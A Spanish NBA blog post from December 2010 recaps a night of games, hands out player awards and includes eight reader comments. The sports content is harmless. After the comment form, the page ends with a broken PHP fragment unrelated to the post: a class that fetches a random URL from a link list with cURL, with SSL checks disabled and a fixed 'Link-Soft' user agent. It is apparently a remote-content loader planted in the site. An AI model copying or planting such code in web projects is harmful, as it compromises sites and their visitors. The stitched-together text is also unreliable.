La Crónica (06/12/2010)

07 de December de 2010 por TheDeerHunter

Jornada interesante en la conferencia Este en la que además, barrieron en el duelo inter-conferencias.

Empezó la fiesta con un Toronto@Indiana muy vistoso (100-124). Los Pacers son fabulosos cuando están finos y la defensa de los Raptors no es de las que amargan la noche a nadie. Este año Granger ha encontrado buenos escuderos en Brandon Rush y Darren Collison, además de solidez por dentro con Hibbert y McRoberts. Inspirados como estaban, apenas Calderón y poco más les pudieron plantar cara.

Sin embargo el Atlanta@Orlando fue bastante más feo de lo que esperábamos (80-74). Los Magic van recuperando la salud pero aún se les ve débiles y los Hawks sin Joe Johnson es un equipo demasiado plano y físico. Ganó sobrado el que llegó a 80 puntos, no digo más. Es curioso que el único que no se ponga enfermo sea Rashard Lewis… aunque a nosotros nos parezca el mayor virus de todos.

Como venís apuntando todos, este año tener un asiento en el Madison por fin merece la pena. Ayer se lo pasaron en grande con un pedazo de partido ante los Wolves (114-121). Frente a unos Beasley&Love en plan posesos,  Stat y los suyos funcionaron como hace años no podían disfrutar en la Gran Manzana. Quinta seguida para los Knicks más “on-fire” de la década.

Por si fuera poco, uno de los gallos del Oeste, los Thunder, sufrieron al mejor Boozer de la temporada y cayeron sin remedio en Chicago (90-99). No estuvieron finos ni Durant, ni Westbrook y sólo Krstic anotó con eficacia. En este contexto no pueden ganar a un buen equipo como los Bulls.

En Milwaukee tocaba exhibición de Wade y los Heat también se encuentran en racha (88-78). Los Bucks no se encuentran a sí mismos y cada vez están más lejos de su objetivo.

Los Jazz apenas sufrieron para doblegar a Memphis (85-94). Deron y CJ Miles suplieron el mal partido del frontcourt de Utah.

Para finalizar los Clippers ganaron a los Kings con un extraordinario Eric Gordon (91-98).

PREMIOS

MVP: Podríamos seguir con Amaré, que está siendo una constante esta semana… pero hoy me quedo con Carlos Boozer, por su impacto tan pronto tras su vuelta y por una actuación más compensada con 29 puntos y 12 rebotes.

El rookie: No hay mucho donde elegir… si acaso nos quedamos con la parejita de los Clippers. 15 ptos Bledsoe, sentando a Baron Davis y rozando un triple doble Blake Griffin, con 13 ptos, 11 reb, 7 asist y 2 tapones.

La sorpresa: Saliendo desde el banco Brandon Rush demoledor: 26 ptos, 4 rebotes, 2 robos y 1 asistencia

La decepción: 0 de 7 entre Richardson y Pietrus ayudan mucho a que Orlando sólo alcance los 74 puntos. Podemos justificarlo por el virus.

El mayor esfuerzo en vano: La parejita Love&Beasley están siendo una de los bombazos de la temporada, pero también son célebres dentro de la categoría. 25-6 para uno y 33-15 para el otro. Bestialidades que se van directas al limbo.

Comenta

8 comentarios a esta entrada

  1. HeiNeKeN dice:
    #1

    Baron Davis 8 asistencias en 20 minutos, pero un -12 para su equipo con el en pista, Bledsoe 15 puntos, 3 asistencias en 27 minutos, pero un +19 para los Clippers… esta claro que con Davis los Clippers no funcionan. Y me esta sorprendiendo gratamente Gordon, no me esperaba el rendimiento que esta teniendo. Equipo a tener en cuenta por sus jovenes valores, solo falta que larguen al paquete mayor del reino…

      Citar

  2. Principe de Bel-Air dice:
    #2

    Esta claro que bledsoe puede salirle bastante bueno a clippers si saben como hacer que mejore y si le dan mas minutos. Aver si puede ser que empiecen a ganar un poco mas porque no tienen un mal equipo que se diga la verdad.

    Boozer impresionante ayer y Korver cumple su rol en el equipo a la perfección

      Citar

  3. alfin dice:
    #3

    espero que love o beasley salgan pronto de minesota y lleguen a un equipo de su nivel(me molaria que uno de los dos llegara a los knicks jejeje)
    hablando de los knicks, era un partido que se tenia para no dejar dudas en la nba y ya poder decir que este año playoffs, pero sobretodo cabe destacar a STAT lleva 5 partidos consecutivos superando los 30 puntos, y raymond felton ha llegado a la estabilidad puntos/asistencias. ni fields ni douglas han echo un gran partido, y creo, para mí, que ha sido clave ronny turiaf cuando los niks perdian de 10.
    mañana, lo siento por calderon, pero como soy de los niks deseo una victoria para mi eqipo

      Citar

  4. sergio dice:
    #4

    Este año tambien esta habiendo muchas decepciones: Duhon, OJ Mayo, Lewis/Q.Richardson, Ilyasova/Maggette/Salmons (% tiro…), Gordon Hayward, Baron Davis,……. etc

      Citar

  5. Denise dice:
    #5

    Algunas decepciones de las que habla Sergio yo ya me las esperaba desde Agosto (Duhon, Lewis y Quentin), vaya partido el Atlanta vs Magic, ganó el menos malo.
    Para decepción la de los Bucks, ay Lemontus que mal trago estará pasando; en cambio, los Heat empiezan a acoplarse y a meter miedo.
    Ojo al equipito que se pueden montar el año que viene en Indiana. Si el general manger hace su trabajo medianamente bien, los Pacers disponen de mucho margen salarial para fichar agentes libres.

      Citar

  6. Sancho88 dice:
    #6

    Si alguien quiere sacar otras conclusiones distintas a que Baron Davis es un paquete, mirad el boxscore del partido y bajad bastante en Sacramento, hasta ver a un chico llamado Pooh Jeter (llegó en las summer leagues de las Vegas desde Europa super rebotado por probar, y se ha quedado). Luego, intentad ver una relación directa entre el -8 de Davis y el +10 de Jeter. Porque Sacramento perdía de 20 o así y salió este chico y a alguno le entraron sudores. No creo que estando Bledsoe en cancha en ese momento le hubiera podido parar. En serio, que el chico salió enchufadísimo y estuvo a punto de cargarse a los Clippers el sólito. Bueno, entre él y Casspi, que era su cómplice en el ultimo cuarto.
    En 17 minutos que jugó metió 11 puntos, 4 rebotes, 2 robos y 2 asistencias, cosa que el paquete de Beno Udrih no consiguió ni de lejos en 27 minutazos, pues sólo mete una canasta el condenao. Luego, pues si os mirais el video de resumen en la pagina de nba, veis el fallo de todos los dias de Cousins. Siempre cuando el equipo puede ganar, se las juega este tipo sin venir a cuento. ya pasó el otro dia contra Dalals.
    Y sí, puede ser que Baron esté para echar a los leones, pero recordad que ha jugado tres o cuatro partidos porque estaba lesionado y que los Clippers, con todas las lesiones que han tenido, ahora ademas se vuelve a romper Kaman, intentaron hacen el equipo de jovenes, con Aminu, Bledsoe, Griffin… y les están dando confianza, y ellos dan resultados.
    Pero me apuesto un eurete a que Davis acaba siendo importante para el equipo, porque cuando estén todos los jugadores al cien por cien, Clippers habrá conseguido tener un quinteto (Bledsoe, Gordon, Butler, Griffin, Kaman), y suplentes de lujo como Davis.

      Citar

  7. -=TheKing=- dice:
    #7

    Menudo Atlanta-Magic, da pena verlos y Howard y las faltas en ataque… no sé que trabajo está realizanto Patt E.con este tío.

      Citar

  8. busky23 dice:
    #8

    Decepciones te puedes llevar si esperabas algo que no ha ocurrido,el tema McGrady,Baron Davis,Quentin…se ve venir,nunca pueden ser decepciones,jugadores de vuelta y media,que han sido la hostia y que ahora se arrastran por las canchas sea por falta de profesionalidad o por sus continuas lesiones. De verdad esperabais algo de Baron Davis???

    Personalmente,mi decepcion de la temporada se la tengo que dar,muy a mi pesar,a un jugador que el año pasado y durante el Mundial me hizo disfrutar de lo lindo,Kevin Durant.
    Sus numeros de esta temporada,son buenos,cuantos los quisieran…(27.4pts,6,8reb.)pero me esperaba mas,mucho mas del que parecia el futuro dominador de la liga.Ha bajado sus porcentajes en todas las facetas del juego,incluidos un bajon condiderable en % de 2 y de 3.Esta noche,sin ir mas lejos 29 pts pero con un 7 de 18,1 de 5 en triples.Hay que pedirle mas,puede y debe. Esto no ha hecho mas que empezar y estoy convencido que volvere a disfrutar con Durantula.

    Por lo demas,me encanta ver a los Knicks,por fin,en plan destroyer y los Bulls,encajando piezas a las mil maravillas.
    Kevin Love a Lakers!!!;)

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>